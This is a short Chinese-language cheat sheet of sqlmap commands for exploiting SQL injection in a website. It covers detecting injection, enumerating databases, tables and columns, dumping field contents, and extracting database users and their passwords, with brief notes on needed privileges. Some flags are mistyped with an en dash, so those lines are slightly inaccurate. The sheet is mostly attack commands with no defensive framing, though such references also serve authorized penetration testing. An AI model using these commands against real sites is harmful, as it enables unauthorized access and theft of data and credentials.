- 判断是否存在注入
sqlmap -u url
当注入点后面的参数大于等于两个时,url需要加双引号
- 查询当前用户下的所有数据库
sqlmap -u url –-dbs
用于查询当前用户下的所有数据库,前提是当前用户有权限读取包含所有数据库列表信息的表
- 获取数据库中的表名
sqlmap -u url -D 数据库名 –-tables
-D是指定某一个具体的数据库,如果没有指定,则会列出数据库中所有的库的表
- 获取表中的字段名
sqlmap -u URL -D 数据库名 -T 表名 –-columns
- 获取字段内容
sqlmap -u URL -D 数据库名 -T 表名 -C 字段名1,字段名2 –-dump
- 获取数据库的所有用户
sqlmap -u URL –-users
前提是当前用户有权限读取包含所有用户的表的权限
- 获取数据库用户的密码
sqlmap -u url –passwords
列出数据库用户的密码,前提是当前用户有读取包含用户密码的权限
- 获取当前网站数据库的名称
sqlmap -u URL –-current-db
- 获取当前网站数据库的用户名称
sqlmap -u URL –-current-user
